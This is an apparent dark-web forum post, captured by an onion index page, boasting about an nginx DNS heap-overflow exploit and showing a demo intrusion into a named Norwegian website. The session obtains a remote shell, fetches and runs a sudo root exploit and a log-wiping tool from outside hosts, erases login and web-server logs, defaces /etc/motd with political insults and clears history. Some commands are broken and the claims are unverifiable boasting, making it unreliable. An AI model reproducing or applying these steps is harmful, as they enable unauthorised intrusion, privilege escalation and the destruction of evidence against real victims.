Onion Information

Page Clicks: 0

First Seen: 05/07/2024

Last Indexed: 10/25/2024

Domain Index Total: 164

So, the nginx off-by-one dns reply overflow bug died, and as pr tradition: Notice the gift for Tofu at the very end :) Sure hope DNMsNO forum upgraded… /* ngingonzo.c * NGINX DNS OFF-BY-ONE REMOTE HEAP DNS OVERFLOW (malloc chunk-chain-sled) * * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * * * Due to the nature of web servers we can keep hammering * it until we are lined up next to a worthwhile byte to * overwrite data, DOP-teqneeq * (based on work by sgrakkyu, sd_, rocky, scrippie, halfdead, halvar & solar designer * and more). The most usable way is to fake the entie heap chunk and overwite the next * chunk's meta data, but that means it's locatoin has to contain our shellcode to a * pointer to it. * The bug can be triggered by CNAME, NAME; QNAME and SRV answers. * CNAME Provides us space fo the overflow and storage for our shellcode * (as the eply to CNAME query's answe when it is inevitably looked up. * Will work on lots TOR sites because of request smuggling and other forced lookups * typical to find on the dorkweb: most are misconfigured. * * Don't end up like dankam. mitnick, kingcope, ik, steveo (it's your fault I broke efnet:), * and so on. * bad boys, bad boys, whatch'a you gonna do when they come for you? * are you suggesting Ac1dB1tch3z should eat even more acid? * are you sure the world would surive that? * who cares? * * Yields UID 80/65535/nobody/nginx shell..after a log of hammering. Tidy up after your mess! * * Testbeds: * poli******.no, etc. * * - punk | AB */ Action Bronson Demo $ cc -o ngingonzo.c $ ./ngingonzo -b -t 3 -s 0 -h www.politiforum.no -p 31337 OS Target: 3: Vanilla linux w/ ASLR 64bit AMD64 NGINX Target: 0: 1.20, 64bit Method: bruteforce hammering (enabled due to fork():) RCE Shellcode: Connect back, UDP Test host: www.poli******zz.no .. Found multiple A Reords: Cloudflare- Accounting for version misrepresentation. **.67.1*3.** **.**.48.15* Hold while afraid.org DNS abuse is set up for us.... Verifying DNS propagation ... OK! GO! Chicka-chicka-bow-wow ... ... b000m! Connection incoming on UDP 31337 $ id; uname uid=80(www) gid=80(www) groups=(web) Linux $ wget -q https://www.p3.net/.notthefolderyouarelookingforanymore.stashnode/sudojudo.py $ python sudojudo.py --full-auto # SUDOJUDO: SUDO VS JUDO :) # Bug info stolen from a some russians in my sniffer logs # Exploit by punk # # Staging fight with race to corrupt control flow..... # IPPON!! # Match won, flawless victory. sudo ain't no match for my judo. # Summer breeze makes me feel good! # sudojudo.py selfdestruct with dd if=/dev/null of=sudojudo.py .. # Done # # Enj00y! # id; uname uid=0(root) gid=0(root) groups=0(root) Linux # echo pwnpwpwn.. er i mean nothing see here. there is no gonzo. pwnpwpwn.. er i mean nothing see here. there is no gonzo. # wget -q https://192.45.34.44/.tmps3cr35545.lollercoaster/evade.bin # chmod +x evade.bin; ./evade.bin --target caller --garbage coredump --full-sweep --nginx --self .:: Cleansing /var/log /var/run and reading nginx config to find log location .:: WTMP... done. .:: UTMPX ..done .:: LASTLOG .. done. .:: auth log .. DONE. .:: Found nginx logs, overwritng core dump crash entries with : ....null bytes & unliking those sectors after sync... .:: ......293 844 entries just went into thin air! .:: CNGRTZ: We're NOT here! :) This "never happened". # ..but you still don't that some things are more secret than simple drug use: # echo "buhuhau iai kna not wirte elelr lse og tastalur har formange taster DNMsNO \ grammartardz. wr1t1ng iz h4rd n0t 0ps3c for you oN the SPECTRUM." >>/dev/null # echo "#####################################################################" >> /etc/motd # echo -e "\nRUSREFORM NÅ!!\n@pupp1, @stormglass, Sylvi Listhaug & Erna Fettberg VAR HER OG SUTRET OVER HELE MESSAGE OF THE DAY!\n" >> /etc/motd # echo "###################################################################" >> /etc/motd # nohup history -c && exit Addeum I have since removed all traces including the motd message, I was merely proving a point. Dr.Gonzo Judging a book by it’s cover makes for a small ignorant buble in a very big world of wisdom you will never know. Jun 9, 2021